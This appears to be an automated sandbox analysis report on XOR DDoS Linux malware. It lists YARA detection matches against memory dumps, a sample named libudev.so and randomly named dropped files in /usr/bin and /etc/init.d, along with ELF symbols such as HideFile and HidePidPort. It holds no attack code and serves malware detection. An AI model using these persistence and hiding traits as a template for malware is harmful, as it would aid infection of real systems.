Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6536.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6410.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/hfdnmorvjd, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/ctwojuywol, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/ctwojuywol, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/cjrbrkowir, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/cjrbrkowir, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/bnuowhwlvc, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/bnuowhwlvc, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/trcmbxxcta, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/trcmbxxcta, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/fsqerkomug, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/fsqerkomug, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/chrcfbeejh, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/chrcfbeejh, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/jjfbelholv, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/jjfbelholv, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/mljnlxkfff, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/mljnlxkfff, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/tiupbsaswr, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/tiupbsaswr, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /etc/init.d/libudev.so, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /etc/init.d/libudev.so, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/uhyqxsqece, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/uhyqxsqece, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/uijxdyxaco, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/uijxdyxaco, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/ypclxoxcxk, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/ypclxoxcxk, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT

Source: libudev.so, type: SAMPLE	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: libudev.so, type: SAMPLE	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6479.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6515.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6498.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6413.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6289.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6551.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6541.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6396.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6407.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6501.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6324.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6321.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6234.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6462.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6489.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6268.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6539.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6286.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6334.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6476.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6399.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6468.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6484.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6495.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6536.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6410.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/hfdnmorvjd, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/ctwojuywol, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/ctwojuywol, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/cjrbrkowir, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/cjrbrkowir, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/bnuowhwlvc, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/bnuowhwlvc, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/trcmbxxcta, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/trcmbxxcta, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/fsqerkomug, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/fsqerkomug, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/chrcfbeejh, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/chrcfbeejh, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/jjfbelholv, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/jjfbelholv, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/mljnlxkfff, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/mljnlxkfff, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/tiupbsaswr, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/tiupbsaswr, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /etc/init.d/libudev.so, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /etc/init.d/libudev.so, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/uhyqxsqece, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/uhyqxsqece, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/uijxdyxaco, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/uijxdyxaco, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/ypclxoxcxk, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/ypclxoxcxk, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection

Source: libudev.so	ELF static info symbol of initial sample: HideFile
Source: libudev.so	ELF static info symbol of initial sample: HidePidPort
Source: libudev.so	ELF static info symbol of initial sample: __after_morecore_hook
Source: libudev.so	ELF static info symbol of initial sample: __free_hook
Source: libudev.so	ELF static info symbol of initial sample: __libc_register_dl_open_hook
Source: libudev.so	ELF static info symbol of initial sample: __libc_register_dlfcn_hook
Source: libudev.so	ELF static info symbol of initial sample: __malloc_hook
Source: libudev.so	ELF static info symbol of initial sample: __malloc_initialize_hook
Source: libudev.so	ELF static info symbol of initial sample: __memalign_hook
Source: libudev.so0.11.dr	ELF static info symbol of dropped file: HideFile
Source: libudev.so0.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: libudev.so0.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: libudev.so0.11.dr	ELF static info symbol of dropped file: __free_hook
Source: libudev.so0.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: libudev.so0.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: libudev.so0.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: libudev.so0.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: libudev.so0.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: mljnlxkfff.11.dr	ELF static info symbol of dropped file: HideFile
Source: mljnlxkfff.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: mljnlxkfff.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: mljnlxkfff.11.dr	ELF static info symbol of dropped file: __free_hook
Source: mljnlxkfff.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: mljnlxkfff.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: mljnlxkfff.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: mljnlxkfff.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: mljnlxkfff.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: jjfbelholv.11.dr	ELF static info symbol of dropped file: HideFile
Source: jjfbelholv.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: jjfbelholv.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: jjfbelholv.11.dr	ELF static info symbol of dropped file: __free_hook
Source: jjfbelholv.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: jjfbelholv.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: jjfbelholv.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: jjfbelholv.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: jjfbelholv.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: trcmbxxcta.11.dr	ELF static info symbol of dropped file: HideFile
Source: trcmbxxcta.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: trcmbxxcta.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: trcmbxxcta.11.dr	ELF static info symbol of dropped file: __free_hook
Source: trcmbxxcta.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: trcmbxxcta.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: trcmbxxcta.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: trcmbxxcta.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: trcmbxxcta.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: ctwojuywol.11.dr	ELF static info symbol of dropped file: HideFile
Source: ctwojuywol.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: ctwojuywol.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: ctwojuywol.11.dr	ELF static info symbol of dropped file: __free_hook
Source: ctwojuywol.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: ctwojuywol.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: ctwojuywol.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: ctwojuywol.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: ctwojuywol.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: fsqerkomug.11.dr	ELF static info symbol of dropped file: HideFile
Source: fsqerkomug.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: fsqerkomug.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: fsqerkomug.11.dr	ELF static info symbol of dropped file: __free_hook
Source: fsqerkomug.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: fsqerkomug.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: fsqerkomug.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: fsqerkomug.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: fsqerkomug.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: cjrbrkowir.11.dr	ELF static info symbol of dropped file: HideFile
Source: cjrbrkowir.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: cjrbrkowir.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: cjrbrkowir.11.dr	ELF static info symbol of dropped file: __free_hook
Source: cjrbrkowir.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: cjrbrkowir.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: cjrbrkowir.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: cjrbrkowir.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: cjrbrkowir.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: ypclxoxcxk.11.dr	ELF static info symbol of dropped file: HideFile
Source: ypclxoxcxk.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: ypclxoxcxk.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: ypclxoxcxk.11.dr	ELF static info symbol of dropped file: __free_hook
Source: ypclxoxcxk.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: ypclxoxcxk.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: ypclxoxcxk.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: ypclxoxcxk.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: ypclxoxcxk.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: uhyqxsqece.11.dr	ELF static info symbol of dropped file: HideFile
Source: uhyqxsqece.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: uhyqxsqece.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
